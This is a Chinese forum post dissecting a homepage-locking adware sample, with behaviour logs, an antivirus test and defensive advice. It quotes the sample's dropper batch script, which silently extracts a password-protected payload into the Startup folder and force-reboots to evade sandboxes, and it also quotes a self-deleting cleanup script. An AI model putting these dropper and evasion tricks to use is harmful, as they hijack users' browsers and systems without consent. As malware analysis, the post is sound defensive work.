本帖最后由 翼风Fly 于 2015-10-13 20:50 编辑
总结:这货就是个死锁主页的加驱流氓,未发现木马病毒特征。
理论无杀软的预防措施:开启UAC,遇到怀疑内容点一下否,然后这货就被灭活了。。。。
希望有UAC的虚拟机开机测试一下。。。。
你看,开UAC多么重要~
PS:刚刚发现一个亮瞎眼的地方,从软件里发现了网站:http://hl.laolaoma.com/
还在为您辛苦设置的浏览器主页在打开时居然变成了其它地址而烦脑吗?
一生锁页为您解决后顾之忧,并且免费使用!
原来这货是以合法身份开发的加驱锁主页工具
详见64楼
http://bbs.kafan.cn/forum.php?mo ... 856719&pid=36057418
内容解析
接下来开始人工分析,菜菜一枚,各位轻拍~
下载后样本的直接分析
OD里简单看了一下,这货就是个启动器,调用了几个系统文件,没看到什么特殊的地方(当然,看的比较草,水平也不够)
这东西用来干啥的?难道就是用来启动?
再看看里面批处理吧(我写了点注释)
[mw_shl_code=shell,true]::获取 当前用户的 运行 文件夹
for /f "skip=1 tokens=2*" %%a in ('reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup') do set qd=%%b
set qd=%qd:~0,-1%
::解压文件
mm.exe x -y -p mm.rar ^"%qd%\^"
::关机重启
Shutdown.exe -r -f -t 0[/mw_shl_code]
快捷方式里的 cmd /c 是为了让你尽可能不会觉察有个批处理在运行
mm.exe其实就是WinRAR 5.21的命令版本,压缩包里一个是LMIns.exe(病毒主体),一个是2345.url (链接到 http://www.2345.com/?kisder)
RAR参数:
x 以完整路径提取文件
y 对所有询问假定选择“是”
p[password] 设置密码
RAR将内容解压到启动文件夹中
密码是一个空格 ,而且竟然还TMD竟然是不常见的全角空格“ ”,对于不熟悉RAR命令行的人来说容易被迷惑;
真仔细。。。醉了。。。
竟然想到了关机啊这个比较绕的办法。。。。。不关机怎么过你的在线/沙箱?
这样的样本杀软能扫到就怪了,病毒被加密了,其他的都是白。
病毒主体:LMIns.exe
本楼层为技术分析,之后请看64楼 http://bbs.kafan.cn/forum.php?mo ... 856719&pid=36057418
PEiD检测:Microsoft Visual Studio .NET 2005 -- 2008 -> Microsoft Corporation [Overlay] *
连壳都不加。原来这是个压缩包,释放5个文件。
(原文件已经由28楼提供下载)
先上在线行为:
【文件B超】https://b-chao.com/index.php/Ind ... 55106FDA7B8ADB85B2/
【哈勃】http://habo.qq.com/file/showdetail?pk=ADwGZ11tB2EIOA==
【火眼】我等的花都谢了。。。 报告还没生出来,先贴坑:http://fireeye.ijinshan.com/anal ... 43ce6a343d27f199a8d
【VirusScan】昨天有人扫了,3个报毒;现在,还是仨;跟进厂商们的速度不给力?
http://www.virscan.org/scan/72208c7a2a96fb3fa168579d3b6077ef
【VirusTotal】还是这里的厂商更新给力(检出率 10 / 56  ):https://www.virustotal.com/en/fi ... nalysis/1444661993/
batfile~.bat
这文件负责运行hlsys32.exe后删除痕迹。
[mw_shl_code=shell,true]"C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /ins
:again
del "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /Q
if exist "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" goto again
del C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\*.* /Q
del %0
[/mw_shl_code]
hlsys32.exe (需要UAC权限)
LaoMa Software ——老马软件?挺形象,哈哈~这东西用来负责下面的文件运行。也就是说,如果这货起不来,下面的都作废。OD简单看了一下,各种系统调用。不过为啥颠来倒去就那几个文件。。。小白不懂。。。
hlsys64.exe
又是LaoMa Software,用来负责64位系统
lksys.ini
一生锁页。。。这个名字带感! 各种浏览器不惧,管他是不是XXX安全浏览器~
[Config]
title=一生锁页
browsers_referer=chrome.exe*ucbrowser.exe*iexplore.exe*firefox.exe*360chrome.exe*360se.exe*liebao.exe*maxthon.exe*qqbrowser.exe*baidubrowser.exe*sogouexplorer.exe*opera.exe*f1browser.exe*2345Explorer.exe*2345chrome.exe*Opera\launcher.exe
url=http://www.2345.com/?kisder
param_deny=
param_reg_deny=
pmode=0
browsers=
saveurl=0
netcfgurl=
notclear=
pmode1=0
param_deny1=
param_reg_deny1=
lockmode=0
id=0
restart=0
secsnotlock=0
hlsys.dat
没仔细看,应该是个驱动
再往下我就不分析了。。。。
没想到我这个菜菜竟然分析出来了
行为日志
2015-10-12 20:38:18 c:\windows\explorer.exe 创建新进程 c:\documents and settings\【用户名】\桌面\1\f-secure\你要的东西.exe 允许 [应用程序]* 命令行: "C:\Documents and Settings\【用户名】\桌面\1\f-secure\你要的东西.exe"
2015-10-12 20:38:19 c:\documents and settings\【用户名】\桌面\1\f-secure\你要的东西.exe 创建新进程 c:\windows\explorer.exe 允许 [应用程序]* 命令行: explorer.exe /e,/select,mm\说明.lnk
2015-10-12 20:38:29 c:\windows\explorer.exe 创建新进程 c:\windows\system32\cmd.exe 允许 [应用程序]* 命令行: "C:\WINDOWS\system32\cmd.exe" /C "@echo off & mm.bat"
2015-10-12 20:38:38 c:\windows\system32\cmd.exe 创建新进程 c:\windows\system32\cmd.exe 允许 [应用程序]* 命令行: C:\WINDOWS\system32\cmd.exe /c reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup
2015-10-12 20:38:42 c:\windows\system32\cmd.exe 创建新进程 c:\windows\system32\reg.exe 允许 [应用程序]* 命令行: reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup
2015-10-12 20:38:46 c:\windows\system32\cmd.exe 创建新进程 c:\documents and settings\【用户名】\桌面\1\f-secure\mm\mm.exe 允许 [应用程序]* 命令行: mm.exe x -y -p mm.rar "C:\Documents and Settings\【用户名】\「开始」菜单\程序\启动\"
2015-10-12 20:38:54 c:\documents and settings\【用户名】\桌面\1\f-secure\mm\mm.exe 修改文件 C:\Documents and Settings\【用户名】\「开始」菜单\程序\启动\LMIns.exe 允许 [文件组]所有执行文件 -> [文件]*; *.exe
2015-10-12 20:38:57 c:\documents and settings\【用户名】\桌面\1\f-secure\mm\mm.exe 修改文件 C:\Documents and Settings\【用户名】\「开始」菜单\程序\启动\2345.url 允许
2015-10-12 20:39:01 c:\windows\system32\cmd.exe 创建新进程 c:\windows\system32\shutdown.exe 阻止 [应用程序]* 命令行: Shutdown.exe -r -f -t 0
果然没什么东西,纯粹靠批处理释放病毒体。用来开机运行的LMIns.exe:
2015-10-12 20:40:40 c:\documents and settings\【用户名】\桌面\lmins.exe 创建文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys32.exe 允许 [文件组]所有执行文件 -> [文件]*; *.exe
2015-10-12 20:40:42 c:\documents and settings\【用户名】\桌面\lmins.exe 创建文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys64.exe 允许 [文件组]所有执行文件 -> [文件]*; *.exe
2015-10-12 20:40:51 c:\documents and settings\【用户名】\桌面\lmins.exe 创建文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\batfile~.bat 允许 [文件组]所有执行文件 -> [文件]*; *.bat
2015-10-12 20:40:59 c:\documents and settings\【用户名】\桌面\lmins.exe 创建新进程 c:\windows\system32\cmd.exe 允许 [应用程序]* 命令行: cmd /c ""C:\DOCUME~1\【用户名】\LOCALS~1\Temp\batfile~.bat" "
2015-10-12 20:41:05 c:\windows\system32\cmd.exe 创建新进程 c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe 允许 [应用程序]* 命令行: "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /ins
2015-10-12 20:41:10 c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe 创建文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\~tmp_hl\mslmedia.sys 允许 [文件组]所有执行文件 -> [文件]*; *.sys
2015-10-12 20:41:15 c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe 创建文件 C:\WINDOWS\system32\DRIVERS\Mslmedia.sys 允许 [文件组]系统执行文件 -> [文件]c:\windows\*; *.sys
2015-10-12 20:41:17 c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe 安装驱动程序或服务 system32\DRIVERS\Mslmedia.sys 允许 [应用程序]*
2015-10-12 20:41:25 c:\windows\system32\services.exe 创建注册表项 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mslmedia 允许 [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Winsock; HelperDllName
2015-10-12 20:41:28 c:\windows\system32\services.exe 修改注册表值 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mslmedia\Start 允许 值: 0x00000001(1)
2015-10-12 20:41:32 c:\windows\system32\services.exe 修改注册表值 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mslmedia\ImagePath 允许 [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\* 值: system32\DRIVERS\Mslmedia.sys
2015-10-12 20:41:37 c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe 修改注册表值 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GroupOrderList\FSFilter Activity Monitor 允许 [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GroupOrderList 值: 04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00
2015-10-12 20:41:39 c:\documents and settings\【用户名】\local settings\temp\lmtp~\hlsys32.exe 删除文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\~tmp_hl\mslmedia.sys 允许 [文件组]所有执行文件 -> [文件]*; *.sys
2015-10-12 20:41:51 c:\windows\system32\services.exe 加载驱动程序 c:\windows\system32\drivers\mslmedia.sys 允许 [应用程序]c:\windows\system32\services.exe
2015-10-12 20:41:53 c:\windows\system32\cmd.exe 删除文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys32.exe 允许 [文件组]所有执行文件 -> [文件]*; *.exe
2015-10-12 20:41:55 c:\windows\system32\cmd.exe 删除文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\lmtp~\hlsys64.exe 允许 [文件组]所有执行文件 -> [文件]*; *.exe
2015-10-12 20:41:57 c:\windows\system32\cmd.exe 删除文件 C:\Documents and Settings\【用户名】\Local Settings\Temp\batfile~.bat 允许 [文件组]所有执行文件 -> [文件]*; *.bat
笑了。。。
刚想重置虚拟机,又有动作:
2015-10-12 20:43:37 c:\windows\system32\svchost.exe 从其他进程复制句柄 (2) c:\windows\explorer.exe 允许 [应用程序]c:\windows\system32\svchost.exe 句柄: (File) \Device\Afd\Endpoint
2015-10-12 20:43:42 c:\windows\explorer.exe 访问网络 UDP [本机 : 1051] -> [120.25.144.64 : 31382] 允许 [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]
2015-10-12 20:43:45 c:\windows\explorer.exe 访问网络 UDP [本机 : 1051] -> [120.25.144.64 : 31381] 允许 [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]
2015-10-12 20:44:06 c:\windows\explorer.exe 访问网络 UDP [本机 : 1051] -> [120.25.144.64 : 31379] 允许 [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]
2015-10-12 20:44:12 c:\windows\explorer.exe 访问网络 UDP [本机 : 1051] -> [120.25.144.64 : 31380] 允许 [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]
2015-10-12 20:44:19 c:\windows\explorer.exe 访问网络 TCP [本机 : 1052] -> [120.25.112.8 : 80 (http)] 允许 [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口] 下面的内容可能是因为我长时间不动,自动执行碎片整理的计划:
2015-10-12 20:47:35 c:\windows\system32\services.exe 向其他进程发送消息 c:\windows\system32\csrss.exe 允许 [应用程序]c:\windows\system32\services.exe 消息: WM_DEVICECHANGE 2015-10-12 21:25:53 c:\windows\system32\winlogon.exe 创建新进程 c:\windows\system32\logon.scr 允许 [应用程序]* 命令行: C:\WINDOWS\System32\logon.scr /s 2015-10-12 21:25:53 c:\windows\system32\svchost.exe 创建新进程 c:\windows\system32\defrag.exe 允许 [应用程序]* 命令行: "C:\WINDOWS\system32\defrag.exe" -p 438 -s 00000B14 -b C: 2015-10-12 21:25:54 c:\windows\system32\winlogon.exe 修改其他进程 c:\windows\system32\logon.scr 允许 [应用程序]c:\windows\system32\winlogon.exe 2015-10-12 21:26:00 c:\windows\system32\defrag.exe 创建文件 C:\DFR8.tmp 允许 [文件]?:\ 2015-10-12 21:26:00 c:\windows\system32\defrag.exe 删除文件 C:\DFR8.tmp 允许 [文件]?:\ 2015-10-12 21:26:01 c:\windows\system32\defrag.exe 从其他进程复制句柄 c:\windows\system32\svchost.exe 允许 [应用程序]* 句柄: (Event) 0x00000B14 2015-10-12 21:26:01 c:\windows\system32\svchost.exe 创建新进程 c:\windows\system32\dfrgntfs.exe 允许 [应用程序]* 命令行: DfrgNtfs.exe -Embedding 2015-10-12 21:26:04 c:\windows\system32\dfrgntfs.exe 底层磁盘读操作 (2) \Device\HarddiskVolume1 允许 [应用程序]*
动作频频嘛。。。。估计这个在线沙箱就不太容易发现了,看来需要等等。。。
以上,分析完毕。
双击测试
本来想测多个杀软的,不过就测一个吧,国内用的最多的
360卫士:版本及防御信息:
默认配置
第一次双击:
单击关闭 x ,启动项被阻断,灭活。但重启
第二次双击:
为什么这次不拦了?成功加入启动项:
篡改成功:
体检一下:
就是个优化,完事了?
虽然接下来有体检的进一步提示,但是明显这种交互有漏洞啊
交互漏洞不管了,手动打开扫描:
不出意外的自动上传样本
但是我不明白这是触发了什么逻辑,会让360全盘来一遍?
核心部分被干掉了,系统恢复正常
=============== 启示 ===============
- 杀毒软件一定不能作死关掉,UAC最好开着,这样的小流氓用杀软扫一下就能搞定;
- 如果这个毒一上来就用OD等反汇编来看,可能会很累,多次释放文件。
- 沙箱竟然可以利用关机破解;不过测试360的沙箱没有关机行为;
- 所以还是虚拟机跑一边比较省事保险。。。。当然遇到反虚拟机的除外
| 
[复制链接]
发表于 2015-10-9 21:20:39
楼主
